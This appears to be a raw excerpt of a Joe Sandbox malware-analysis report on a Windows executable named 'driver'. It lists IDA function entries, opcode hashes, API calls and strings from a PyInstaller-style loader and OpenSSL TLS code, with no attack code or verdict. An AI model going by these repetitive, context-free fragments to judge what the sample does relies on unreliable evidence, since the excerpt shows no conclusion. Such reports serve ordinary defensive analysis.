                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction ID: 0e530bf6ec4a31556f756fb59efd52d43437f2bc56a48447978c2b5b462c6272
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9319672609B8185EB608F61E8503EE33A1FB94B48F044039DB4D87B9ADF7CC548D710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction ID: 5bc0d29506105087d2c8a1f49be6f8983aebef5fb94696d37093237eca1eef7f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0319632649B8185E724CF25E8503EE73A0FB98B58F540135EA8D87B56DF7CD145D700
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                                • API String ID: 0-1194634662
                                                                                                                                                                                                                                                • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                                • Instruction ID: 31f8748ad1afb994dd932e8d89ba660335ddb6155f73b3aa3fd1a259b6303af2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7D18032B0A682AAFF10DB65D8457A96B90EB85BC4F044036EE4C4B7D6CF3DD551CB28
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                                • Instruction ID: 91e68470de462d66c865fd2ba66edf8e9a75287a0fcb9acb5776d5c6d4e0bee3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70B1B423B5A68245EB649B67E5001B963D1EB44FE8F444136EA5D87BCAEFBCE441F300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C61208
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                                • API String ID: 3535234312-3130753023
                                                                                                                                                                                                                                                • Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                                • Instruction ID: 159cb9f9cda39d2e5b5dc27899aa57017ebeb677d2229db6f4517c35d36ceb2e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1712D462A0EA82A5FF109B65D4052BDBB90EF81BC4F014032DE4D4B7D6DF7CE5618B28
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C61208
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                                                                                • API String ID: 3535234312-446233508
                                                                                                                                                                                                                                                • Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                                • Instruction ID: 0139034c6a5bfd93f2c773d5e91f20edc0fe335ba06230ad0286ffddf7668075
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDD1D461B0EA4365FF60AB2295513BEA291EF84BC8F151031ED4D47BC6CF3DE5618B28
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5830
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5842
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5879
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B588B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58A4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58B6
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58CF
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58E1
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58FD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B590F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B592B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B593D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5959
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B596B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5987
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5999
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59B5
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59C7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction ID: 1a4a8b8ae3738dd822fd62e5b595c0371242586de205768acc21d5c28d3092ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F229F24ACBB4791FA549B57E8241B423E1BF08F9DF845139D81E82667FFFCA548B240
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction ID: 616c99a6fb8ce4113730a897815d4c5eee867979b0081abeb44ab7417fc0096e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE02B321ACFB07D1FA549B67E8605B422A1BF08F5DF850135D41E822A7EFBCF148B260
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6A29B88A7,?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B821C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                • Instruction ID: c5dae3934ef6882ee404ad6c9267fd937729bb3f5562b0bdf3f77c849e5be53d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE51B611E9F64281FB509B23E8512BA6291FF98F8CF444031DA0EC66D7EEBCE505A750
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                • Opcode ID: cf25af0a676f0320bbeb8c6e09f6f45fcd74eb2065ef69918a422b85099bb7eb
                                                                                                                                                                                                                                                • Instruction ID: d47d60451200b6bfc848e0532d6d9e2ab77ffb955b8ce996f5f3577a18d1f497
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf25af0a676f0320bbeb8c6e09f6f45fcd74eb2065ef69918a422b85099bb7eb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8519A21B8A64692FA10AB63E4601A963A1BF44F9CF444131EE0C87B97DFBCF555B740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C6126570
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                                                                                • API String ID: 800424832-1099454403
                                                                                                                                                                                                                                                • Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                                • Instruction ID: 8dd8ffdc8982c1016f32c84bc3cec5960191dd59818e3f743e2c58fd02ceb0d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00419E72B1AA06A6EF148B10E85037927A0EB48BD0F009535EA0EC36D5DF3CE570CB38
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • 00007FF8B9F73010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A868B253
                                                                                                                                                                                                                                                • 00007FF8B9F73010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A868B334
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
